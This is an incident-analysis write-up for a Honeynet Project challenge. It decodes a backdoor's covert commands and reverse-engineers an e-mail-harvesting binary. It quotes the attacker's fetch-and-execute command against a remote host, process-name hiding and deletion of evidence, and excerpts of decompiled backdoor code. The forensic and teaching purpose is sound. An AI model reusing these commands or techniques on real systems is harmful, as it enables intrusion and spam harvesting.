Honeynet Project Scan of the Month - Scan 22 (August 2002)

Honeynet Project Scan of the Month - Scan 22 (August 2002)

Submission by Eloy Paris <peloy at chapus dot net>
Thu Aug 22 19:00:17 EDT 2002

To Chapu and he/she that is coming

Table of Contents

Summary
Analysis
Answers
Files
Thanks
Appendix A - NVP Backdoor Commands
Appendix B - Testing

The Honeynet Project's Scan of the Month for August requires the analysis of network traffic from/to a compromised host on which a backdoor program was installed by the perpetrator. We will see how the attacker uses this backdoor to instruct the compromised honeypot to execute several commands. One particular command downloads an executable from another host that seems to be under control of the attacker, and then executes it. The provided Snort log (a file that contains captured network traffic) suggests that the executable launches a Denial of Service (DoS) attack against a specific site (web.icq.com.) However, after reverse-engineering the downloaded file I conclude that the attacker is pursuing a completely different objective.

2. Analysis

In this section I discuss the steps that I followed to analyze the Snort network trace that was provided.

2.1 Background Information

The first thing I notice after looking at the provided network capture (running "tcpdump -r snort-0718@1401") is that there is Network Voice Protocol (NVP) traffic. NVP is an IP protocol, with a protocol number of 11.

This sounds really familiar: the Honeynet Project's Reverse Challenge, which took place in May of this year, required reverse-engineering a program that was left running on a compromised honeypot.

After reverse-engineering this program[1] it was determined that its purpose was to act as a backdoor that would give the person that compromised the honeypot the following capabilities:

Ability to run arbitrary commands on the compromised host, and request that the output from the commands be sent to certain IP addresses (which are remotely configurable)
A root shell on demand
Ability to use the compromised host to launch different types of Denial of Services (DoS) attacks on specific targets. The types of DoS attacks the backdoor is able to perform are: TCP SYN flood, ICMP or UDP fragmentation attack (jolt2) and DNS flood.

Now, the novel thing about the backdoor was that all communications between the backdoor and its handler were done via IP protocol 11 (NVP), which doesn't seem to be currently in use. Also, the IP data (which is used to tell the backdoor what commands to execute, what DoS to launch, victim IP addresses, etc.) was codified with a simple algorithm, so unless the appropriate decoder is used it is not possible to make any sense of the data by just looking at it.

2.2 Network Traffic Analysis

Knowing that the network traces contained IP protocol 11 traffic I analyzed the problem from the point of view of communications between the backdoor reverse-engineered during the Reverse Challenge and its handler.

With this in mind I wrote a small C program, dump.c[2], that processes the Snort log and prints out the commands sent to the backdoor as well as its responses. I ran this program on the provided Snort log and used the program output in the first step of my analysis. The program output is too large to be included here, but I am including it in Appendix A.

By looking at the output we can clearly see what the attacker is doing:

Packet #7:
```
    11:09:13.557615 94.0.146.98 > 172.16.183.2: ip-proto-11 402
```
Initialize communication parameters. The backdoor is configured to send all its responses to the IP address 203.173.144.50.
Packet #8:
```
    11:10:34.876658 192.146.201.172 > 172.16.183.2:  ip-proto-11 402
```
Request that the backdoor executes the command "grep -i "zone" /etc/named.conf" and send back the results.

Packet #12:

    11:10:35.005093 172.16.183.2 > 203.173.144.50:  ip-proto-11 512

The following result is sent back:

    zone "." {
    zone "0.0.127.in-addr.arpa" {

Packet #22:
```
    11:10:35.495194 172.16.183.2 > 203.173.144.50: ip-proto-11 463
```
Final part of the command requested in packet #8. It's just an empty string.
Packets #62 and #63:
```
    15:35:00.285126 168.148.27.14 > 172.16.183.2:  ip-proto-11 402
    15:35:56.667243 10.39.81.89 > 172.16.183.2:  ip-proto-11 402
```
The handler requests (twice) that the backdoor executes the command "killall -9 ttserve". This suggests that the attacker had run in the past a program called "ttserve" and wanted to make sure it was not running at this time.
Packet #72:
```
    15:57:37.983480 58.248.76.90 > 172.16.183.2:  ip-proto-11 402
```
This is perhaps the most important command since I will be focusing on its effects for the remainder of this paper. The attacker requests that the backdoor executes the following command (without sending back the output):

killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;

The important commands here are "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve" and "./ttserve". Well analyze these later on.

Packets #1236, #1237, and #1282:

    16:02:40.043361 218.209.145.27 > 172.16.183.2:  ip-proto-11 402
    16:03:37.492985 122.255.17.55 > 172.16.183.2:  ip-proto-11 402
    16:04:33.707291 26.44.146.84 > 172.16.183.2:  ip-proto-11 402

Request (three times) the execution of the command "killall -9 lynx ; rm -rf /tmp/ttserve;"

Now that I have identified the commands the attacker has sent to the backdoor I can use standard tools to study the rest of the network traffic that was captured. Using Ethereal or tcpdump I can see the following traffic patterns (see note below about the IP 11.11.11.11 shown in the following packets):

Packet #73:
```
15:57:39.114395 172.16.183.2.1025 > 11.11.11.11.8882: S
240028091:240028091(0) win 32120  (DF)
```
The 3-way handshake for the HTTP download from 216.242.103.2:8882 starts. The download starts two packets later (packet #76.)

Packet #528:

The download ends:

15:57:52.376036 11.11.11.11.8882 > 172.16.183.2.1025: R
215579:215579(0) ack 546 win 31856  (DF)

Packet #529:
```
15:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413: udp 3
```
An UDP packet from the compromised honeypot to 216.242.103.2 port 53413.

Note: This is a "preview". There's no way of knowing at this point that the UDP packet goes to 216.242.103.2. Here we see that it goes to 11.11.11.11. I know it doesn't go to 11.11.11.11 but to 216.242.103.2 because I reverse-engineered "foo". See the next note below.
Packet #530:
```
15:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025: udp 10
```
216.242.103.2 responds with another UDP packet.

216.242.103.2 seems to be under the control of the attacker too (compromised.) If this is the case, the reason why the attacker didn't use 216.242.103.2 instead of the honeypot for his/her evil doings eludes me.
Finally, from packet #531 to the end of the capture, I see a lot of HTTP traffic between the compromised host and host web.icq.com. In particular, the compromised host downloads /wwp?Uin=x from web.icq.com (where x is incrementing by 1, i.e. x+1, x+2, etc.) I see DNS requests to resolve web.icq.com and the normal HTTP traffic to and from port 80 of web.icq.com.
The HTTP downloads from web.icq.com might lead me to think that what "foo" is doing is just a DoS on web.icq.com. We shall see if this is true...

Note: There is something weird here: I know that the HTTP download that starts in packet #73 is for a file from 216.242.103.2:8882. However, the Snort log shows 216.242.103.2 as 11.11.11.11. Some possible explanations for this include:

The honeypot was configured to use a HTTP proxy. This is unlikely, though, since after the HTTP download finishes there is UDP traffic initiated by the downloaded program ("foo"), and this traffic is also shown in the Snort log as going to 11.11.11.11. Also, there are more HTTP downloads (from web.icq.com) and these do show up with the correct server address (that there are downloads from web.icq.com and that they show up fine in the Snort log is not a strong argument, though, because the downloads are done by "foo", and not by an usual utility like wget or lynx running on the honeypot.)
There is some kind of IP redirection going on on the honeypot. This is unlikely too because the downloads from web.icq.com show up OK in the Snort log, as do the NVP traffic between the honeypot and its handler.
The Snort log was edited to obfuscate what was happening and make the Scan of the Month more challenging, or to protect the identity of someone.
The IP header checksum is invalid (we can see this with tcpdump or ethereal) and I know this is not possible because the honeypot is running Linux, and the Linux kernel always calculates the IP header checksum, even if sending packets via raw sockets (see the raw(7) manual page.) Furthermore, an IP packet with an invalid checksum would have been dropped (read RFC-791)

To confirm this theory I picked one packet and calculated manually the IP header checksum but using the IP address I believe was originally there (which was obtained through the reverse-engineering process.) The result matched the checksum present in the Snort log. This means that the IP header originally did not have 11.11.11.11 as the address in the source or destination fields of the IP header.

So, I strongly believe the Snort log has been tampered with, but this is not important since I will reverse engineer "foo". What is important is to note that whenever we see 11.11.11.11 in the Snort log (as shown above) that's not the real IP address the packet is coming from/going to.

2.3 "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve"

As I mentioned in the previous section, in packet #72 the attacker requests that the backdoor execute several commands. One of these commands just downloads using HTTP a file called 'foo' from a specific HTTP server (at IP address 216.242.103.2, TCP port 8882.) The command saves "foo" as "/tmp/ttserve" and then executes it.

Since I know that running "ttserve" generates HTTP traffic against web.icq.com, it is absolutely necessary to get a hold of this file so it can be analyzed.

As we shall see, if the Honeynet Project had given us a little bit more of network capture, I would not have needed to get a hold of "foo" and study it. However, seeing what happens after packet #5085 would make this Scan of the Month too easy :-)

There are several ways of reconstructing "foo" from the Snort log file. Some of these are: 1) Use Ethereal to reconstruct the HTTP conversation, save the conversation to disk (it will be saved as a text file) and then a write a small script that processes the file and generates the binary (we can also do something similar with tcpdump or even Snort in tcpdump file reading mode.) 2) Write a custom program that processes the Snort log file directly and generates the binary. Any language that has an interface to libpcap (C and Perl, for example) will make things easier. 3) Take advantage of a tool that someone already wrote, like Jeremy Elson's tcpflow.

In this case I just used tcpflow, which is perhaps the easiest way because there is no need to write any code:

peloy@canaima:/tmp$ tcpflow -r snort-0718%401401.log
peloy@canaima:/tmp$ vi 011.011.011.011.08882-172.016.183.002.01025
peloy@canaima:/tmp$ mv 011.011.011.011.08882-172.016.183.002.01025 foo

tcpflow generates several files but I chose the one that starts with "011.011.011.011" because that's the one that contains the HTTP download (remember that the port used was 8882, which is embedded in the file name above.)

I edited the file (as shown above) to remove the header returned by the HTTP server. (By the way, recovering binary files from Snort logs has been covered extensively in previous Scans of the Month.)

Now that I have "foo", a.k.a. "ttserve", the fun can begin.

2.4 Reverse-Engineering "foo"

As I mentioned at the end of section 2.2, the HTTP traffic between the compromised honeypot and web.icq.com might lead us to think that the sole purpose in life of "foo" is to execute a DoS attack against web.icq.com. In fact, the Snort log shows how "foo" needs to retry the downloads several times, or that three-way handshakes fail, or that TCP connections are RST, all of which suggest that web.icq.com might be flooded with HTTP requests and that the "DoS attack" is being successful. However, the only way of determining the purpose of "foo" for sure is by reverse-engineering it.

I reverse-engineered "foo" and came up with an equivalent C program, foo.c, which is easier to understand. With the source code for "foo" we can now understand exactly what "foo" does, and what the attacker was trying to do. "foo" has the following characteristics:

Was written in C
Runs on i386 Linux (of course, the compromised honeypot was running i386 Linux)
Is statically linked against the Linux C library 5.3.12. This allows it to run on any Linux machine, regardless of the installed version of the C library.
Was probably created in the same environment (Slackware 3.1, GCC 2.7.2) where the-binary (from the Reverse Challenge) was created.
Was not compiled with optimization. This makes easier the de-compilation process.

The most difficult part of reverse-engineering a binary like "foo" that is statically-linked is reconstructing the symbol table, and figure out the calls to functions in the C library. When I disassembled the-binary for the Reverse Challenge I used a very cumbersome process to reconstruct the symbol table. Fortunately, the winner of the Challenge, Dion Mendel, developed some fantastic tools that make reconstructing a symbol table a children's game. So, for this reverse-engineering task I used his tools, which can be downloaded from http://www.honeynet.org/reverse/results/sol/sol-06/.

Once the symbol table is reconstructed all you need is a little bit of patience and some knowledge of assembly language, C, network programming, and how a C compiler generates assembly language for some C constructs, like variable allocation, "if" statements, "for", "do ... while()" and "while ()" loops. Plain old paper and pencil help too. Basically, one starts with the assembly language listing and reconstructs the equivalent C program.

For more information on reverse-engineering a binary I recommend you read some of the top 20 submissions for the Reverse Engineer Challenge. They are worth reading.

The features of "foo" will be explained in detail in Question 4.

3. Answers

Question 1. What is the attacker's IP address?

The attacker initializes the backdoor running on the hacked honeypot in packet #7. The initialization (command code 2 - see packet-format.txt) tells the backdoor to send its responses to one particular IP address as well as to 9 other randomly generated IP addresses (response mode 1), although there is a bug in the backdoor and only 8 random IPs are used (in addition to the real IP sent by the attacker.)

The initialization command used in packet #7 configures the backdoor to respond to the IP address 203.173.144.50. However, I don't know for sure if this is the IP address of the machine being used by the attacker since he/she could be sniffing traffic going to that machine or network. The attacker could be in the same IP network as 203.173.144.50, or sniffing in a segment that traffic going to 203.173.144.50 must cross.

I cannot infer anything from the source IPs in the packets that control the backdoor since these IPs are spoofed, i.e. they are random IPs.

203.173.144.50 resolves to p50-tnt7.syd.ihug.com.au. The web page at www.ihug.com.au tells us that IHUG is an Internet Service Provider in Australia. "whois 203.173.144.50" confirms that the IP address to which the backdoor will send its responses is in a block assigned to IHUG.

The FQDN of the machine also gives information about the physical location where the attacker might be located: Sydney, Australia.

The Snort log that was provided during the Reverse Challenge (so participants could test their network traffic decoders) shows that the attacker programmed the backdoor to respond to the IP 203.173.144.35 (p35-tnt7.syd.ihug.com.au). This IP is in the same network, which suggests that the attacker is connecting to the Internet via dial-up because he/she gets a different IP with each new connection. If this ISP keeps connection logs for its users, and given that we know the exact time the attacker was messing around with the compromised host, it would be easy to further track the attacker (account that was used during the attacks, phone number the attacker dialed in from, etc.)

Question 2. What is the attacker doing first? What do you think is his/her motivation for doing this?

There are three things the attacker does before starting what I consider the attacker's main activity:

Initialize the backdoor running on the compromised honeypot to respond to one specific IP address and to 9 other random IP addresses (as explained in Question 1.) The motivation for this is obvious: to be able to see the results of the commands sent to the backdoor and to get status of the tasks being executed by the backdoor.
Instruct the backdoor to run the command "grep -i 'zone' /etc/named.conf", and send back the results (output.) The results sent back to the attacker imply that BIND on the compromised host is configured as authoritative for (i.e. the DNS server answers for) two zones: the root zone (".") and "0.0.127.in-addr.arpa". I think the motivation is that the attacker might be trying to map out the network topology and do some reconnaissance.

Another additional motivation might be to find out if the honeypot was going to cache DNS requests during an attack (be it a DoS or just a sweep of web pages to harvest e-mail addresses) initiated from the compromised honeypot. If DNS requests are cached there is less network activity that can reveal that something is going on.

The presence of /etc/named.conf does not imply that named is running, though.
Download a binary called "foo" from a web server running on port 8882 of a remote host. I've talked in detail about this download before, so I will only mention here that the motivation for doing this is to use the download as a tool for a very specific purpose, which I will explain in the next section.

Question 3. Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?

Actually, all the packets this question refers to have readable text (including packets #15 and #16.) I assume this is just a minor mistake. The readable text is towards the end of the packets and looks like (but is a bit different in each packet):

0x01b0   207b 0a7a 6f6e 6520 2230 2e30 2e31 3237    .{.zone."0.0.127
0x01c0   2e69 6e2d 6164 6472 2e61 7270 6122 207b    .in-addr.arpa".{
0x01d0   0a00 636f 6e66 2220 313e 202f 746d 702f    ..conf".1>./tmp/
0x01e0   2e68 6a32 3337 3334 3920 323e 2631 0098    .hj237349.2>&1

I believe the packets the Honeynet Project is referring to as containing readable text are part of two batches: the first batch contains packets #9 to #17, and the second contains packets #18, #20, #21, #22, #24, #25, #26, #27, and #28. Note that each batch has exactly 9 packets.

All the packets in these two batches are responses sent by the backdoor running on the compromised honeypot to the IP address specified in the initialization command (see Question 1) plus 8 random IPs, and contain the output of the command that the attacker instructed the backdoor to execute with packet #8.

The first batch contains the actual output from the command:

zone "." {
zone "0.0.127.in-addr.arpa" {

The second batch just contains an empty string, and is there to signal the end of the command output. Think of it like a C string: a C string is a sequence of characters that ends with a null byte. Well, the only way the attacker has of knowing there is no more output coming from the backdoor is by receiving a last packet with an empty string.

The reason why some packets have readable text is because of a mistake done by the author of the-binary: if you look at my de-compilation of the-binary you'll see that the backdoor encodes for sending 400 bytes (see line 245 of the-binary.c), but then sends (in line 246) 400 bytes plus an additional random number (between 0 and 201) of bytes:

     70         char *bufptr, buffer[400];
    [...]
    232               bufptr = buffer;
    233               do {
    234                   bytes_read = fread(ippacket, 1, 398, output_file);
    235                   ippacket[bytes_read] = '\0';
    236                   for (i = 0; i <= 397; i++)
    237                       decoded[i + 2] = ippacket[i];
    [...]
    245                   encode(400, decodedptr, bufptr);
    246                   send_response(ips_ptr, bufptr,
    247                                   (rand() % 201) + 400);
    248                   usleep(400000);
    249               } while (bytes_read != 0);

There are between 0 and 201 bytes the backdoor is not encoding, and these bytes represent the readable text we see in the network packets this question refers to: bufptr points to a buffer of 400 bytes located in the stack (declared in line 70), and since we are telling send_response() to send between 400 and 601 bytes, most of the time send_response() will read past the end of the buffer pointed to by bufptr, which is a part of the stack that happens to have text that is not encoded. The solution to this problem would be to make the buffer bigger (601 bytes) and encode the exact number of bytes we are sending.

As you can see, knowledge about the internals of the-binary really help to understand what we are seeing on the wire.

By the way, I mentioned in question #1 above that the attacker configured the backdoor to send responses to 1 specific IP and to 9 random IPs, but that because of a bug in the backdoor only 8 random IPs are used. This is what we are seeing here: packets #17 to #25 are the output of the command 'grep -i "zone" /etc/named.conf', sent to 9 IPs instead of 10 because of the bug.

Question 4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?

Just by looking quickly at the decompiled "foo" (foo.c) we can infer that the purpose of "foo" is to harvest electronic mail addresses from web.icq.com via HTTP, and once a certain number has been collected, send them via UDP to a particular host on the Net.

I must confess that I was fooled by the Snort log when I first tried to guess the purpose of "foo". The reason is that the only thing I saw in the network trace were HTTP connections (lots of them) from the compromised honeypot to web.icq.com, and this led me to believe that "foo" was performing a DoS attack against this host. So, it wasn't until I finished reverse-engineering "foo" that I realized what "foo" was really doing.

"foo" works in the following way:

Once "foo" starts it conceals its program name so users don't notice (with "ps") that something strange is running on the system. "foo" accomplishes this by changing the program's first argument (main()'s argv[0]) to "(nfsiod)". the-binary, from the Reverse Challenge, also conceals its program name in the same way, but using "[mingetty]" instead. The final result, is that running "ps aux" on the honeypot would show a swapped-out process called "(nfsiod)" instead of the real "/tmp/ttserve".
Then "foo" does several administrative things like setting up signal handling so SIGCHLD and SIGPIPE are ignored, changing the current working directory to "/", and setting the UID and EUID to 1 (the reason for this eludes me), and then forks. The parent exits and the child stays running.
Finally, "foo" enters an infinite loop in which it will keep doing its evil work of harvesting e-mail addresses until the attacker tells it to stop (via a special command) or until there are communication problems. In this infinite loop, "foo" will: 1) Communicate via UDP with its master (handler). In this communication "foo" will request an action to perform, or will send a list of collected e-mail addresses if it has one ready; and 2) Collect e-mail addresses from web.icq.com.

The communication between "foo" and its master follows a very simple protocol:

"foo" sends to host 216.242.103.2, UDP port 53413, a packet with the data "GU\n". The author of "foo" was probably thinking in "GU" as in "Get Uin", as we shall see.
Host 216.242.103.2 responds to the same UDP port and host from where the "GU" packet originated with one of two responses: a "DU" command or a "DIE" command.
If the command is "DIE", "foo" knows that it is time to die, and calls "exit()", and everything ends there.
If the command is "DU", the UDP data will look like "DUx\n", where "x" is a number, represented in ASCII. "x" is read with sscanf() as a number that will be used as the starting Uin to use in the sweep of web pages from web.icq.com. Probably the author of "foo" was thinking in "DU" as "Do Uin's" or something like that.
After the "DU" command is received, "foo" starts a sweep of ICQ web pages. The pattern it follows is:
```
GET /wwp?Uin=x
GET /wwp?Uin=x+1
GET /wwp?Uin=x+2
[...]
```
where x is the number that was received in the "GU" command, and the delay between GETs is hard-coded at 25 seconds.

"foo" will harvest e-mail addresses from these web pages. It will do so by parsing the downloaded web page for the string "mailto:" and saving the text that follows, i.e. an e-mail address.
After 100 e-mail addresses (this number is hard-coded too) have been collected, "foo" sends a "SE" command (my guess is that "SE" stands for "Send E-mail addresses") to 216.242.103.2, UDP port 53413. The "SE" command has the following format:
"SEx\nuser1@domain1\nuser2@domain2\n ...user100@domain100\n"

(the x after "SE" is the Uin that was received in the "GU" command.)
The handler (216.242.103.2 in this case) must then acknowledge the receipt of the e-mail addresses by sending a "GOT" command. This command just has the three-character string "GOT" as its UDP data. If "foo" doesn't receive the "GOT" command it will keep sending the "SE" command. After 10 unsuccessful retries, "foo" will give up and exit.
Since UDP is not reliable, there are attempts to provide reliability at the application level. In other words, "foo" has code to retransmit commands (up to 10 times) if a response from the master doesn't arrive in 10 seconds. After retrying 10 times without success, "foo" gives up and exits.

Appendix B contains a sample communication session where the protocol can be seen at work.

As we can see, if the Honeynet Project had included a few more packets from their Snort log we would have seen "foo" sending some e-mail addresses to 216.242.103.2 UDP port 53413, and reverse-engineering "foo" would not have been necessary. I can only assume this was done on purpose, to make the Scan of the Month more interesting :-)

Regarding the skills of the author of "foo", I would say that the author is neither a beginner nor an advanced programmer (perhaps closer to "advanced" than to "beginner") The program is well structured (good use of subroutines), the communication protocol between "foo" and its handler is very simple but works well and is well implemented. Error handling seems to be done well and and the application-level reliability (because of the lack of reliability in UDP) is also implemented (and implemented well.)

I saw many stupid things (and even bugs) when I decompiled the-binary from the Reverse Challenge, and the facts (build environment, programming style) lead me to conclude that it was the same programmer who wrote both the-binary and foo. However, "foo" looks a bit better and doesn't have the mistakes made in the-binary. But this might be just because the program is much simpler.

The code in foo.c's harvest_email_addresses() function, especially the code that parses an HTML page looking for "mailto:" URIs is a bit hairy, with excessive use of if's and else's, though. This could be simplified.

I'd say that "foo" was written by someone that is getting good at programming.

Question 5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?

"./ttserve" just executes the program "foo", which was downloaded from http://216.242.103.2:8882/foo and saved as /tmp/ttserve (see section 2.3.) Running "ttserve" will start the e-mail harvesting process I explained in Question 4.

As we saw in the previous question, one of the first things that ttserve (a.k.a. "foo") does when it runs is to fork. The parent process exits but the child stays running doing its evil business. This means that control returns to the shell and the command "rm -rf /tmp/ttserve" is executed while "ttserve" is still running. /tmp/ttserve is removed by the attacker to get rid of the evidence. Now that the program is running there is not need to have the executable laying around anymore.

Remember also that "ttserve" concealed its program name as "(nfsiod)" so it could not be noticed by a valid user of the honeypot through the "ps" command. This is an extra measure to prevent detection of the activities performed by the attacker.

Finally, since './ttserve ; rm -rf /tmp/ttserve' is not executed through an interactive shell, there is no .history or .bash_history file that can be used to determine what commands the attacker executed.

Question 6. How do you think the attacker will use the results of his activity involving 'foo'?

As we saw, foo is a tool that harvests electronic mail addresses from web.icq.com. In these days when e-mail spamming has become one of the worst plagues of the 21st century (an e-plague), it is fairly obvious what the attacker can do with thousands of e-mail addresses collected automatically by a little program in very little time. Ways in which the attacker could use the results of his activity involving "foo" include:

The attacker might be a spammer, so he/she would use all these e-mail addresses collected by "foo" to send unsolicited mail to innocent people.
Or he might just sell all these addresses. Coincidentally, I just received a spam e-mail from a bozo that was offering for sale thousands of e-mail addresses.
Or the attacker could use the e-mail addresses to create havoc, like DoS'ing an ISP's SMTP server, or mail-bombing these innocent souls.

I find #1 the most possible use of the e-mail addresses.

Bonus Question. If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it?

I just administer a home network, and my border router is configured to block most traffic except some traffic that I explicitly allow for services I use. For example, I allow HTTP traffic to go through.

The border router is also configured to log all blocked traffic to an internal syslog server, so I would probably have noticed the NVP traffic by looking at the syslog:

Aug 12 19:33:57 gw 7455: Aug 12 23:33:57: %SEC-6-IPACCESSLOGNP:
   list 111 denied 11 ww.xxx.yy.zzz -> aa.bb.ccc.ddd, 1 packet

(the 11 after "denied" means "IP protocol 11")

The above syslog entry was generated when the border router blocked an incoming IP packet that had the IP protocol field set to 11 (NVP.)

Obviously, I would only have noticed the NVP packet, but I would not have obtained the real packet unless I was also capturing network.

An Intrusion Detection System (IDS) like Snort would be the best way to detect the NVP backdoor because we could add signatures that would trigger an alert on the presence of IP protocol 11 traffic, and we could also have the IDS save the suspicious traffic to a disk file for later analysis. The Reverse Challenge (see question 4) asked a similar question to this one.

What would have been hard to notice is the sweep of web pages from web.icq.com that "foo" performs to harvest e-mail addresses. It is hard because it is legitimate traffic that is not logged anywhere, that is small, and that has a very slow rate (happens every 25 seconds.)

Summarizing:

NVP backdoor traffic is easy to detect and prevent: block IP protocol 11 at border routers, and log all denied traffic.
Slow-rate HTTP sweeps are hard to detect.

4. Files

This section contains links to all the files referenced in this paper as well as a short summary of the purpose of the file.

Scan 22 Files

dump.c: Program used to generate the network dump that can be seen in Appendix A.
foo: It's a 200K file so I am not including it here. To reconstruct this file you'll need the Snort log for this Scan of the Month and to follow the instructions in section 2.3.
foo.c: decompiled "foo". This file allows to understand "foo"'s mission in life. It was generated through a reverse-engineering process.
dump5.txt: assembly language source code for "foo". This is what I used to generate foo.c. This file was generated using the tools that Dion Mendel developed for the Reverse Challenge.

Files Used in Testing

wwp: CGI script to put in your web server's cgi-bin directory. The script receives a numeric parameter called "Uin" via the HTTP GET request and generates a pseudo-homepage that contains a "mailto:" URI that "foo" parses to harvest e-mail addresses.

Reverse Challenge Files

packet-format.txt: Format of packets for communications between backdoor and handler. I obtained this during my reverse-engineering of the-binary in the Reverse Challenge.
the-binary.c: This generates the-binary (the backdoor). Provided here because it is useful to understand how the backdoor and the handler communicate with each other. Also because it is needed to answer Question 3.
control.c: allows to control the backdoor. Provided for completeness.

5. Thanks

Reverse-engineering foo, a.k.a. ttserve, took me a lot less time than what it took to reverse-engineer the-binary in the Reverse Challenge thanks to the tools that Dion Mendel <quietude at iinet dot net dot au> developed during the Challenge. Reconstructing the symbol table of foo was a no-brainer thanks to these tools (I feel ashamed of the approach I took back then - please don't ask)
The Honeynet Project for these cool challenges.

Appendix A - NVP Backdoor Commands

In this appendix I include the output of dump.c after passing it the Snort log provided for this Scan of the Month. The log is a network trace that has 5085 packets. Here I am only including the packets that are related to communications between the backdoor running on the compromised honeypot and the handler.

Please note that in the Snort log there is more NVP (IP protocol 11) traffic than what I am showing here (specifically, there are 16 packets not shown below.) The reason why I didn't include these 16 packets is because they are not relevant: remember that in packet 7 the NVP backdoor was initialized to send responses to 1 particular IP address plus 9 random addresses (of which only 8 are used due to a bug.) I am not including here the responses sent to random IPs. These responses account for the missing 16 packets.

peloy@canaima:/tmp$ dump -f snort-0718%401401.log
[...]
--------------------------------------------------
Packet 7, 11:09:13.557615

Length of IP data: 402 bytes
94.0.146.98 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 2 (Initialize communication parameters)
Response mode: 1 (To 1 specific IP address and 9 random IP addresses)
Respond to: 203.173.144.50 
--------------------------------------------------
Packet 8, 11:10:34.876658 

Length of IP data: 402 bytes
192.146.201.172 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 3 (Execute command, send back results)
Command to execute: grep -i "zone" /etc/named.conf
--------------------------------------------------
Packet 12, 11:10:35.005093

Length of IP data: 512 bytes
172.16.183.2 -> 203.173.144.50
Length of IP data: 512
IP protocol is NVP
Direction: From backdoor
Command output:
'zone "." {
zone "0.0.127.in-addr.arpa" {
'
--------------------------------------------------
Packet 22, 11:10:35.495194 

Length of IP data: 463 bytes
172.16.183.2 -> 203.173.144.50
Length of IP data: 463
IP protocol is NVP
Direction: From backdoor
Command output:
''
--------------------------------------------------
Packet 62, 15:35:00.285126 

Length of IP data: 402 bytes
168.148.27.14 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve
--------------------------------------------------
Packet 63, 15:35:56.667243 

Length of IP data: 402 bytes
10.39.81.89 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve
--------------------------------------------------
Packet 72, 15:57:37.983480 

Length of IP data: 402 bytes
58.248.76.90 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 ttserve ; 
   lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; 
   chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ;
   rm -rf /tmp/ttserve ./ttserve ;
--------------------------------------------------
Packet 1236, 16:02:40.043361 

Length of IP data: 402 bytes
218.209.145.27 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
Packet 1237, 16:03:37.492985 

Length of IP data: 402 bytes
122.255.17.55 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------
Packet 1282, 16:04:33.707291 

Length of IP data: 402 bytes
26.44.146.84 -> 172.16.183.2
Length of IP data: 402
IP protocol is NVP
Direction: To backdoor
Command: 7 (Execute remote command, don't send back results)
Command to execute: killall -9 lynx ; rm -rf /tmp/ttserve;
--------------------------------------------------

Appendix B - Testing

Now that I have studied foo.c there's little doubt regarding what's the evil purpose of "foo". However, it always pays to do a little bit of testing, so I made a couple of minor changes to foo.c and recreated a test environment.

First, I wrote a small Perl script that simulates the /wwp script found at web.icq.com. The script is passed a parameter called Uin via a HTTP GET request. When the script is run it just generates a short HTML document that simulates a user's home page, and includes a "mailto:" URI.

Next I edited foo.c and changed all references to "web.icq.com/wwp" to "localhost/cgi-bin/wwp" so when "foo" starts sweeping web pages it does so in my local Apache server, and not the remote web.icq.com. I also replaced all references to 216.242.103.2 with localhost, so when "foo" tries to contact the handler to get instructions it contacts my local machine.

Finally, I ran "foo" and netcat on the local machine. I started netcat with parameters to listen for connections on local UDP port 53413, which is what "foo" is programmed to do. I was then able to control foo by sending it manual commands.

The following is a sample testing session:

peloy@canaima:/tmp$ vi foo.c                # s/web.icq.com/localhost/, etc.
peloy@canaima:/tmp$ gcc -Wall -o foo foo.c  # compile my foo.c
peloy@canaima:/tmp$ ps aux | grep nfs       # see if foo is running
peloy@canaima:/tmp$ ./foo                   # run foo
peloy@canaima:/tmp$ ps aux | grep nfs       # see if it is running now
peloy     7362  0.0  0.0  1316  500 ?        S    19:45   0:00 (nfsiod)
peloy@canaima:/tmp$ nc -l -u -p 53413 -vv   # netcat: listen on UDP port 53413
listening on [any] 53413 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 33508
GU                   <- foo sends the "Get Uin" command
GU                   <- I didn't respond so foo resends
DU1073               -> I respond
SE1073               <- A few seconds later foo sends the e-mails it's
1073@whatever.com       * harvested
1074@whatever.com       *
1075@whatever.com       *
1076@whatever.com       *
1077@whatever.com       *
1078@whatever.com       *
1079@whatever.com       *
1080@whatever.com       *
1081@whatever.com       *
1082@whatever.com       *
1083@whatever.com       *
1084@whatever.com       *
GOT                  -> I respond saying "I got the addresses"
GU                   <- foo asks for the next Uin
DIE                  -> I tell him it is time to die
 sent 15, rcvd 233
peloy@canaima:/tmp$ ps aux | grep nfs  # confirm that foo died
peloy@canaima:/tmp$ # it did :)

Footnotes

[1] I reverse-engineered the-binary from the Reverse Challenge. However, I could not finish in time so I didn't make a submission. My work with the-binary definitely helped me to understand some of the most important points of this Scan of the Month.

